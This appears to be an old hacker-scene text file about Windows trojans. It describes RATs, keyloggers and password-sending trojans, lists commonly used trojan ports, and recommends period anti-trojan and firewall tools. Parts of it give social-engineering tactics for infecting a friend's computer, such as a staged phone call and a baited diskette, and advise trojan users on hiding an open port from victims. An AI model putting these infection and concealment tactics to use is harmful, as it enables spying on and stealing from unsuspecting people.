You can of course get infected by some of your "friends" when they

have physical access to your computer.Let's suppose you leave

someone on your computer just for 5 minutes,then of course you can

get infected by one of your "friends".There are some very smart people

out there that keep thinking of new ways of getting physical access

to someone's computer.Here are some tricks that are interesting:



1.You "friend" may ask you "Hey bro can you give me some water"

or something that will leave him alone.You'll go to take some

water and then........You know



2.The attacker may have a plan.Let's say you invited him/her

at 12:00 at your home and that attacker told one of your

"friends" to call the victim at 12:15 and start talking

about something with the victim.The attacker again have time

to infect you.

Also the "friend" that is calling you may say something like

"Is there anyone around you,if so move somewhere

else I don't want anyone to hear what we are talking about"

The attacker is again alone and have time to infect you.



6.5 Trick



This is one trick that may work on people that really

want something and the attacker knows what is it.

Let's say that the victim wants to watch some porno

or want xxx passwords,then attacker can just leave

a diskette with the trojan in the front of the victim's

house and put the trojan with some xxx pics of course.



This is bad things because sometimes if you really want

something and you finally found it you don't think about

anything else except to check it you.You again get infected.



I hope now you understand how you got infected the last time

(if you got infected of course).

----------------------------------->



7.How dangerous a trojan can be?

/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/



Many people that don't know what a trojan is

think that when they run an executable nothing

happened because their computer is still working

and all the data is there,if it was a virus

their data will be damaged and their computer will

stop working.



Someone is downloading and uploading files on your computer.

Someone is reading all of your IRC logs and learning

interesting things about you and your friends.

Someone is reading ALL of your ICQ messages.

Someone is deleting files on your computer.



These are some examples how dangerous a trojan can be.

There people that use trojans just to place virus

on the infected machine like CIH and destroy the machine.

--------------------------->



8.Different Kinds Of Trojans

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Remote Access Trojans

-------------------------------



These trojans are the most popular trojans now.

Everyone wants to have such trojan because he

or she want to have access to their victim's hard drive.

The RAT'S (remote access trojans)are very

simple to use.Just make someone run the server

and you get the victim's IP and you have FULL

access to his or her computer.They you can

almost everything it depends of the trojan you use.

But the RAT'S have the common remote access trojan functions like:

keylogger,upload and download function,

make a screen shot and so on.Some people use the

trojans for malicious purposes.

They want just to delete and delete.This is lame.But a have a guide

about the best way to use a trojan.You should read it.

There are many programs out there

that detects the most common trojans,but new trojans are

coming every day and these programs are not the maximum defense.

The trojans do always the same things.

If the trojan restart every time Windows is loaded that

means it put something in the registry

or in win.ini or in other system file so the trojan can restart.

Also the trojans create some file in

the WINDOWS\SYSTEM directory.The file is always looking

to be something that the victim will think

is a normal WINDOWS executable.Most trojans hide

from the Alt+Ctrl+Del menu.This is not

good because there are people who use only this way to see

which process are running.There are programs

that will tell me you exactly the process and the

file from where it comes.Yeah but some trojans

as I told you use fake names and it's a little hard

for some people to understand which process

should they kill.The remote access trojans opens

a port on your computer letting everyone to connect.

Some trojans has options like change the port

and put a password so only the guy that infect you

will be able to use the computer.The change

port option is very good because I'm sure you

don't want your victim to see that port 31337 is open

on their computer.Remote access trojans are

appearing every day and they will continue to appear.

For those that use such trojans: BE CAREFUL

you can infect yourself and they the victim you

wanted to destroy will revenge and you'll be sorry.

---------------------------------------

Password Sending Trojans



The purpose of these trojans is to rip all cached

passwords and send them to specified e-mail

without letting the victim about the e-mail.

Most of these trojans don't restart every time Windows

is loaded and most of them use port 25 to

send the e-mail.There are such trojans that e-mail

other information too like ICQ number

computer info and so on.These trojans are dangerous if

you have any passwords cached anywhere on your computer.

----------------------------------------

Keyloggers



These trojans are very simple.The only one thing

they do is to log the keys that the victim is pressing

and then check for passwords in the log file.

In the most cases these trojans restart every

time Windows is loaded.They have options

like online and offline recording.In the online recording

they know that the victim is online and

they record everything.But in the offline recording

everything written after Windows start is

recorded and saved on the victims disk waiting for

to be transferred.

----------------------------------------

Destructive



The only one function of these trojans is to

destroy and delete files.This makes them very simple

and easy to use.They can automatically

delete all your .dll or .ini or .exe files on your computer.

These are very dangerous trojans and once

you're infected be sure if you don't disinfect your

computer information will no longer exist.

-----------------------------------------

FTP trojans



These trojans open port 21 on your computer

letting EVERYONE that has a FTP client to connect

to your computer without password and will full upload and download options.





These are the most common trojans.They all are dangerous

and you should me careful using them.

-------------------------------------->

9.Who Can Infect You?



/=-=-=-=-=-=-=-=-=-=-=/

Well basically you can get infected by everyone that know how

to use a trojan(it's VERY easy) and of course know how to infect you.

People that use trojans are wannabe hackers that are just at the stage

of using trojans.Some of these people don't move to the next stage

and they're lamers that can only use trojans and as I said it's VERY easy.

But after reading this text you'll know the most common ways that someone

can infect you with a trojan and it will be hard for the people using them

to infect you.

------------------------>

10.What Is The Attacker Looking For?



/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/

Some of you may think that trojans are used for damage only.

Well they can also be used to spy on someone's machine and

take a lot of private information from it.Wellthe common data an attacker looks

for would include but not limit to the following.



-----> Credit Card Information

-----> Credit Information

-----> Checking Account Information

-----> Any accounting data

-----> Data bases

-----> Mailing Lists

-----> Personal Addresses

-----> Email Addresses

-----> Account Passwords

-----> Home Office / Small Business Information

-----> Company Accounts / Subscribed for Services

-----> Resumes

-----> Email

-----> Any Company Information / Services He Can Access

-----> Your or spouse's first and last name

-----> Children's names / ages

-----> Your address

-----> Your telephone number

-----> Letters you write to people

-----> Email

-----> Your personal resume

-----> Your family pictures

-----> School work

-----> Any school accounts / information

wanna know moreeeeeeeeeeeeeeeeeeeeeeeee

Trojan Part 2

11.How The Trojans Works

/=-=-=-=-=-=-=-=-=-=-=-=/



Here I'll explain you how the trojans work.If you don't know some words

you can check the "Terms Used In The Text" section and read about them there.

When the victim runs the server it does functions like opening some specific port and listening

for connections.It can use TCP or UPD protocols.

When you connect with the victim IP the you can do what you want because the server let you do

the trojan functions on the infected computer.Some trojans restart every time Windows is loaded.

They modify win.ini or system.ini so the trojan can restart but most of the new trojans use the

registry so they can restart.

Trojans communicate like client and server.The victim runs the server,the attacker sends command

to the infected server with the client and the server is just following what the client "says" to it.

-------------------------->



12.The Most Common Trojan Ports

/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/

Here's a list of the most common trojan ports:



Satanz Backdoor
666

Silencer
1001

Shivka-Burka
1600

SpySender
1807

Shockrave
1981

WebEx
1001

Doly Trojan
1011

Psyber Stream Server
1170

Ultors Trojan
1234

VooDoo Doll
1245

FTP99CMP
1492

BackDoor
1999

Trojan Cow
2001

Ripper
2023

Bugs
2115

Deep Throat
2140

The Invasor
2140

Phineas Phucker
2801

Masters Paradise
30129

Portal of Doom
3700

WinCrash
4092

ICQTrojan
4590

Sockets de Troie
5000

Sockets de Troie 1.x
5001

Firehotcker
5321

Blade Runner
5400

Blade Runner 1.x
5401

Blade Runner 2.x
5402

Robo-Hack
5569

DeepThroat
6670

DeepThroat
6771

GateCrasher
6969

Priority
6969

Remote Grab
7000

NetMonitor
7300

NetMonitor 1.x
7301

NetMonitor 2.x
7306

NetMonitor 3.x
7307

NetMonitor 4.x
7308

ICKiller
7789

Portal of Doom
9872

Portal of Doom 1.x
9873

Portal of Doom 2.x
9874

Portal of Doom 3.x
9875

Portal of Doom 4.x
10067

Portal of Doom 5.x
10167

iNi-Killer
9989

Senna Spy
11000

Progenic trojan
11223

Hack?99 KeyLogger
12223

GabanBus
1245

NetBus
1245

Whack-a-mole
12361

Whack-a-mole 1.x
12362

Priority
16969

Millennium
20001

NetBus 2 Pro
20034

GirlFriend
21544

Prosiak
22222

Prosiak
33333

Evil FTP
23456

Ugly FTP
23456

Delta
26274

Back Orifice
31337

Back Orifice
31338

DeepBO
31338

NetSpy DK
31339

BOWhack
31666

BigGluck
34324

The Spy
40412

Masters Paradise
40421

Masters Paradise 1.x
40422

Masters Paradise 2.x
40423

Masters Paradise 3.x
40426

Sockets de Troie
50505

Fore
50766

Remote Windows Shutdown
53001

Telecommando
61466

Devil
65000

The tHing
6400

NetBus 1.x
12346

NetBus Pro 20034

SubSeven
1243

NetSphere
30100

Silencer
1001

Millenium
20000

Devil 1.03
65000

NetMonitor
7306

Streaming Audio Trojan
1170

Socket23
30303

Gatecrasher
6969

Telecommando
61466

Gjamer
12076

IcqTrojen
4950

Priotrity
16969

Vodoo
1245

Wincrash
5742

Wincrash2
2583

Netspy
1033

ShockRave
1981

Stealth Spy
555

Pass Ripper
2023

Attack FTP
666

GirlFriend
21554

Fore, Schwindler
50766

Tiny Telnet Server
34324

Kuang
30999

Senna Spy Trojans
11000

WhackJob
23456

Phase0
555

BladeRunner
5400

IcqTrojan
4950

InIkiller
9989

PortalOfDoom
9872

ProgenicTrojan
11223

Prosiak 0.47
22222

RemoteWindowsShutdown
53001

RoboHack
5569

Silencer
1001

Striker
2565

TheSpy
40412

TrojanCow
2001

UglyFtp
23456

WebEx
1001

Backdoor
1999

Phineas
2801

Psyber Streaming Server
1509

Indoctrination
6939

Hackers Paradise
456

Doly Trojan
1011

FTP99CMP
1492

Shiva Burka
1600

Remote Windows Shutdown
53001

BigGluck,
34324

NetSpy DK
31339

Hack?99 KeyLogger
12223

iNi-Killer
9989

ICQKiller
7789

Portal of Doom
9875

Firehotcker
5321

Master Paradise
40423

BO jammerkillahV
121

--------------------------------->



13.How Can I Monitor My Computer Without Scanner?

/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/



Again the masses think that when they have some

trojan scanner or anti-virus one they're secure.

Well the best way you can check for trojans is to do

it by your own.You're not sure is the trojan scanner

working correctly so start checking it alone.

In this text I've included one list of software and

reviews of course that will help you check your system

for trojans.



Well you always need to check which ports are opened on

your system and if you see that one of the common trojan

ports is open you're probably infected.

*NOTE*

You can check that by typing "netstat"

in the MS-DOS prompt or use other software

that can do this for you

*NOTE*

Always pay attention to which files are running on your

computer and check for something suspicious in it like

it's name.Well I think you'll check files like

config.EXE,himem.exe or winlilo.exe or other funny one.

Just Hex Edit them and if you find something interesting

like "SchoolBus Server" kill the running file.

Make sure you're monitoring your registry and check

every new change in it.Also be sure you monitor

system.ini or win.ini because there're still

trojans that restart from there.

And as I told you always download software like

ICQ,MIRC or some other well known program from

the official page.

Following these simple rules will help you

prevent your computer from getting infected.

---------------------------------->



14.Software To Help You Monitor Your Computer

/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/



As I told you I've included one list of software

that will help you monitor your computer and help

you prevent trojan infections.



+++++++++++++++

----LogMonitor+

+++++++++++++++



Files and directories monitoring tool

=====================================

Version: 1.3.4

Home page: http://www.geocities.com/koenigvad/Eng/

Author: Vadim Dumbravanu, koenigvad@yahoo.com



Log Monitor is a files and directories monitoring tool. The program

periodically checks selected file's modification time and executes

external program if file's time was changed or not changed. For

directories it handles such events as files change, addition or

removal.



Works under Windows 95/98/NT.



It's free for personal and business use. See LICENSE.TXT for

copyright information.



This file contains following topics:



1. Purpose

2. Usage

3. Some features

4. Installation

5. Uninstallation



1. PURPOSE





The program is intended for different administrators using

automated processes. From time to time these processes stop working

or can even terminate abnormally. Sometimes processes create or

update error log-files. Log Monitor can watch over such processes

via their log-files and warn administrators about problems.



Users can watch over common network folders and see what happens

within their directories.



2. USAGE

Most of automated processes track log-files, periodically updating

them. Accordingly, if such process will terminate abnormally,

log-files cease changing.



If the process did not update the log-file during selected

interval, Log Monitor runs an external program. It can be "net send

bla bla bla", or paging program, or process restart. Log Monitor

can run a program if the file was changed too, so you can check

error files for changes.



Log Monitor can also watch over directories and handle files

change, addition or removal events within directory tree.



Log Monitor can be used as a task scheduler. NT Scheduler Service

is uncomfortable if you need to run a task every hour for example.

Using Log Monitor you can add nonexisting file, then select

interval of 3600 seconds and the program. As long as the file does

not update, selected program will run every hour.



You can specify working time and days when program will be

launched.



3. SOME FEATURES

- Several files or directories can be monitored simultaneously,

each file has its own interval and is processing in a separate

thread.

- A list of monitoring processes stores in the configuration file.



- Minimizes to the System Tray (and restores from it). ;)



- There is an ability to pause monitoring of selected files.

"Paused" state can be stored in the configuration file.



- Works on the schedule, can check files and directories only during selected time interval and days of week or month.



- Many other really beautiful things.



++++++++++++

----PrcView+

++++++++++++



PrcView is a freeware process viewer utility that shows comprehensive

information about running processes. This information includes such

details as the creation time, version and full path for each DLL used

by a selected process, a list of all threads, memory blocks and heaps.

PrcVIew also allows you to kill and attach a debugger to a selected process.

PrcView runs on both Windows 95/98 and Windows NT platforms and includes

Windows and command-line version of the program.

This software is free and freely distributable on a non-commercial basis in the format

ORIGINALLY RELEASED (PrcView.zip) with the original Copyright clause.

The author expressly disclaims any warranty for this software. This software and

any related documentation is provided "as is" without warranty of any kind.



Distribution of the program or any work based on the program by a commercial

organization to any third party is permitted only with the written permission of the author



If you encounter a problem while running PrcView, please visit

http://www.teamcti.com to obtain the latest version. If you still have problems,

please send a short description to: IgorNys@writeme.com



----XNetStat



XNetStat is a program like the "netstat"

command in the MS-DOS promt.The programs

shows you all of the open ports of your computer

and all of the established connections.

Mail fresh@arez.com if you want it

or have questions about it.



++++++++++++

----AtGuard+

++++++++++++



AtGuard is a nice firewall with some cool

features.It can also show you which file

opened a connection from your computer

that is VERY useful if you want to detect

some trojans on your machine.

I currently lost the URL for that program

but try searching altavista.com

or packetstorm.securify.com



+++++++++++++++++++++++++

-----ConSeal PC FIREWALL+

+++++++++++++++++++++++++



This software will help you to secure your PC.

It has some major advantages over other PC-based firewalls.

It is available on Windows 95, Windows 98 and Windows NT

(3.51 & 4.0).

This is probably the best firewall for Windows machines

that will help you block trojans ports on your machine

and also against various D.O.S attacks.



+++++++++++++++++

----LockDown2000+

+++++++++++++++++



This is really good anti-trojan package that detects

a LOT of trojans and other tools and also acts as a firewall,

protect you against nuke and ICQ attacks.It also

block file sharing so you won't have problems with it.

It's updated regulary with many new trojan definitions.

A must have for those of you that want to be protected

against attacks and trojan infections.



You can get it at http://www.lockdown2000.com



++++++++++

----TDS-2+

++++++++++



Trojan Defence Suite is also one very good

anti trojan package with a lot of functions and

plugins in it.It also detects probably all of

the trojans out there and is regulary updated.

A must have for those of you that want to be protected

against attacks and trojan infections.



You can get it at http://www.tds.diamondcs.com.au



Using all of these tools of course with the anti-trojan

packages will result in one SECURE against trojans

Windows machine so go and get them.



15.Placing BackDoors In Programs

/=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/



The people that infect with trojans are becoming smarter.

They started placing the trojans in some real programs that

everyone is using so they can infect the victim.

Most of the people know that when they run a trojan

nothing will happen or an error message will apear,but

when the trojan is "joined" with another program

the program will work normally without any error messages

and the victim will think that he/she is not infected.

That's not right.Programmers made such programs that

just "join" two or more executables in one so they

can place the trojan in some programs that everyone

know about.

Such well known programs with open source are

also very dangerous.Good programmer may modify

the source and make it like a trojan so let's

say you're using modified e-mail client.As well

all know the password sending trojans use port 25

to send the e-mail with the information.How about

if the attacker modified the e-mail client to send

your e-mail password to him/her.You'll of course

see(if you're monitoring)that port 25 is open but

probably you won't pay attention because you're sending

e-mails and that's why the port is open.

As I said people are becoming smarter and smarter.